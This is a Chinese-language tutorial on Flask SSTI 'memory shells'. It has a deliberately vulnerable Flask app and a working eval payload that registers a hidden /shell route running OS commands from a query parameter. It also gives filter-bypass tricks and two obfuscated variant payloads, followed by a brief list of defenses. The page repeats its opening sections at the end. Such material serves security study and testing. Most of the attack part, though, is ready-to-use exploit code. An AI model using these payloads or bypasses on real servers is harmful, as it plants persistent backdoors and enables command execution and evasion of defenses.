Python 内存马分析与防御指南<\/h1>

一、前言<\/h2>
Python 内存马是一种基于 Flask 框架的 SSTI (Server-Side Template Injection) 漏洞利用技术。攻击者通过注入恶意代码，在服务器内存中动态创建路由，实现持久化后门访问。<\/p>

二、Flask 框架基础<\/h2>

1. Flask 请求上下文管理机制<\/h3>

Flask 使用两种上下文：<\/p>

请求上下文 (request context)<\/li>

应用上下文 (session context)<\/li> <\/ul>

请求上下文实例化后会被 push 到栈 _request_ctx_stack<\/code> 中，这是一个栈结构，可以通过获取栈顶元素来获取当前请求。<\/p>

2. 路由注册机制<\/h3>
Flask 通过 @app.route()<\/code> 装饰器注册路由，底层实际调用 add_url_rule<\/code> 方法：<\/p>
app.<\/span>add_url_rule(rule, endpoint, view_func, ...<\/span>)
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

rule<\/code>: URL规则，必须以\/开头<\/li>
endpoint<\/code>: 端点名称，用于url_for反向解析<\/li>
view_func<\/code>: 视图函数<\/li>
<\/ul>
三、漏洞原理<\/h2>
1. SSTI 漏洞示例<\/h3>
from<\/span> flask import<\/span> Flask, request, render_template_string
<\/span><\/span>
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route('\/'<\/span>)
<\/span><\/span>def<\/span> hello_world<\/span>():
<\/span><\/span>    person =<\/span> 'knave'<\/span>
<\/span><\/span>    if<\/span> request.<\/span>args.<\/span>get('name'<\/span>):
<\/span><\/span>        person =<\/span> request.<\/span>args.<\/span>get('name'<\/span>)
<\/span><\/span>    template =<\/span> '<h1>Hi, <\/span>%s<\/span>.<\/h1>'<\/span> %<\/span> person
<\/span><\/span>    return<\/span> render_template_string(template)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    app.<\/span>run()
<\/span><\/span><\/code><\/pre>当用户输入包含模板注入代码时，如 {{7*7}}<\/code>，会导致代码执行。<\/p>
2. 内存马核心Payload<\/h3>
url_for.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>](
<\/span><\/span>    "app.add_url_rule('\/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())"<\/span>,
<\/span><\/span>    {'_request_ctx_stack'<\/span>: url_for.<\/span>__globals__['_request_ctx_stack'<\/span>], 
<\/span><\/span>     'app'<\/span>: url_for.<\/span>__globals__['current_app'<\/span>]}
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>四、Payload 详细分析<\/h2>
1. 代码执行部分<\/h3>
url_for.__globals__['__builtins__']['eval']<\/code> 解析：<\/p>

url_for<\/code>: Flask内置函数<\/li>
__globals__<\/code>: 返回函数所在模块命名空间的所有变量<\/li>
__builtins__<\/code>: Python内置模块，包含eval、exec等函数<\/li>
<\/ul>
2. 路由注入部分<\/h3>
app.add_url_rule('\/shell', 'shell', lambda :__import__('os').popen(...).read())<\/code>:<\/p>

动态添加\/shell<\/code>路由<\/li>
使用lambda匿名函数作为视图函数<\/li>
通过_request_ctx_stack.top.request.args.get('cmd')<\/code>获取命令参数<\/li>
默认执行whoami<\/code>命令<\/li>
<\/ul>
3. 上下文传递<\/h3>
{'_request_ctx_stack'<\/span>: url_for.<\/span>__globals__['_request_ctx_stack'<\/span>],
<\/span><\/span> 'app'<\/span>: url_for.<\/span>__globals__['current_app'<\/span>]}
<\/span><\/span><\/code><\/pre>确保eval执行时能获取到必要的全局变量。<\/p>
五、Bypass 技术<\/h2>
1. 函数替换<\/h3>


url_for<\/code>可替换为：<\/p>

get_flashed_messages<\/code><\/li>
request.__init__<\/code><\/li>
request.application<\/code><\/li>
<\/ul>
<\/li>

eval<\/code>可替换为exec<\/code>等执行函数<\/p>
<\/li>
<\/ul>
2. 字符串拼接<\/h3>
['__bui'<\/span>+<\/span>'ltins__'<\/span>]['ev'<\/span>+<\/span>'al'<\/span>]
<\/span><\/span><\/code><\/pre>3. 属性访问替代<\/h3>

__globals__<\/code>替换：<\/li>
<\/ul>
__getattribute__('__globa'<\/span>+<\/span>'ls__'<\/span>)
<\/span><\/span><\/code><\/pre>
[]<\/code>访问替换：<\/li>
<\/ul>
.<\/span>__getitem__() 或 .<\/span>pop()
<\/span><\/span><\/code><\/pre>4. 模板标记绕过<\/h3>

使用{% %}<\/code>替代{{ }}<\/code>：<\/li>
<\/ul>
{%<\/span> if<\/span> request.<\/span>application.<\/span>__globals__.<\/span>__builtins__.<\/span>eval(...<\/span>) %<\/span>}1<\/span>{%<\/span> endif %<\/span>}
<\/span><\/span><\/code><\/pre>5. 特殊字符绕过<\/h3>

_<\/code>可用编码绕过：<\/li>
<\/ul>
\x5f\x5fclass\x5f\x5f
<\/span><\/span>\u005f\u005fclass\u005f\u005f
<\/span><\/span><\/code><\/pre>
其他获取_<\/code>的方法：<\/li>
<\/ul>
dir(0<\/span>)[0<\/span>][0<\/span>]
<\/span><\/span>request['args'<\/span>]
<\/span><\/span>request['values'<\/span>]
<\/span><\/span><\/code><\/pre>6. 点号绕过<\/h3>
使用attr()<\/code>或[]<\/code>：<\/p>
request|<\/span>attr('application'<\/span>)
<\/span><\/span>request['application'<\/span>]
<\/span><\/span><\/code><\/pre>六、变形Payload示例<\/h2>
变形Payload 1<\/h3>
request.<\/span>application.<\/span>__self__.<\/span>_get_data_for_json.<\/span>__getattribute__('__globa'<\/span> +<\/span> 'ls__'<\/span>).<\/span>__getitem__('__bui'<\/span> +<\/span> 'ltins__'<\/span>).<\/span>__getitem__('ex'<\/span> +<\/span> 'ec'<\/span>)(
<\/span><\/span>    "app.add_url_rule('\/h3rmesk1t', 'h3rmesk1t', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell', 'calc')).read())"<\/span>,
<\/span><\/span>    {'_request_ct'<\/span> +<\/span> 'x_stack'<\/span>: get_flashed_messages.<\/span>__getattribute__('__globa'<\/span> +<\/span> 'ls__'<\/span>).<\/span>pop('_request_'<\/span> +<\/span> 'ctx_stack'<\/span>),
<\/span><\/span>     'app'<\/span>: get_flashed_messages.<\/span>__getattribute__('__globa'<\/span> +<\/span> 'ls__'<\/span>).<\/span>pop('curre'<\/span> +<\/span> 'nt_app'<\/span>)}
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>变形Payload 2<\/h3>
get_flashed_messages|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>globals<\/span>\x5f\x5f<\/span>"<\/span>)|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>getitem<\/span>\x5f\x5f<\/span>"<\/span>)("__builtins__"<\/span>)|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>getitem<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\u0065\u0076\u0061\u006c<\/span>"<\/span>)(
<\/span><\/span>    "app.add_ur"<\/span> +<\/span> "l_rule('\/h3rmesk1t', 'h3rmesk1t', la"<\/span> +<\/span> "mbda :__imp"<\/span> +<\/span> "ort__('o"<\/span> +<\/span> "s').po"<\/span> +<\/span> "pen(_request_c"<\/span> +<\/span> "tx_stack.to"<\/span> +<\/span> "p.re"<\/span> +<\/span> "quest.args.get('shell')).re"<\/span> +<\/span> "ad())"<\/span>,
<\/span><\/span>    {'<\/span>\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b<\/span>'<\/span>: get_flashed_messages|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>globals<\/span>\x5f\x5f<\/span>"<\/span>)|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>getitem<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b<\/span>"<\/span>),
<\/span><\/span>     'app'<\/span>: get_flashed_messages|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>globals<\/span>\x5f\x5f<\/span>"<\/span>)|<\/span>attr("<\/span>\x5f\x5f<\/span>getattribute<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\x5f\x5f<\/span>getitem<\/span>\x5f\x5f<\/span>"<\/span>)("<\/span>\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u005f\u0061\u0070\u0070<\/span>"<\/span>)}
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>七、防御措施<\/h2>


输入过滤<\/strong>：<\/p>

对所有用户输入进行严格过滤<\/li>
禁止特殊字符如{{ }}<\/code>、{% %}<\/code>等<\/li>
<\/ul>
<\/li>

模板渲染安全<\/strong>：<\/p>

避免使用render_template_string<\/code><\/li>
使用安全的模板引擎如Jinja2的自动转义功能<\/li>
<\/ul>
<\/li>

最小权限原则<\/strong>：<\/p>

应用运行在低权限用户下<\/li>
禁用危险的内置函数<\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

检查所有路由注册代码<\/li>
监控异常路由添加行为<\/li>
<\/ul>
<\/li>

WAF防护<\/strong>：<\/p>

部署Web应用防火墙<\/li>
配置SSTI攻击检测规则<\/li>
<\/ul>
<\/li>

依赖更新<\/strong>：<\/p>

保持Flask和相关依赖库最新版本<\/li>
<\/ul>
<\/li>
<\/ol>
通过以上措施，可以有效防范Python内存马攻击，保护Web应用安全。<\/p>

Python 内存马分析与防御指南<\/h1>

一、前言<\/h2> Python 内存马是一种基于 Flask 框架的 SSTI (Server-Side Template Injection) 漏洞利用技术。攻击者通过注入恶意代码，在服务器内存中动态创建路由，实现持久化后门访问。<\/p>

二、Flask 框架基础<\/h2>

三、漏洞原理<\/h2>

四、Payload 详细分析<\/h2>

五、Bypass 技术<\/h2>

六、变形Payload示例<\/h2>

一、前言<\/h2>
Python 内存马是一种基于 Flask 框架的 SSTI (Server-Side Template Injection) 漏洞利用技术。攻击者通过注入恶意代码，在服务器内存中动态创建路由，实现持久化后门访问。<\/p>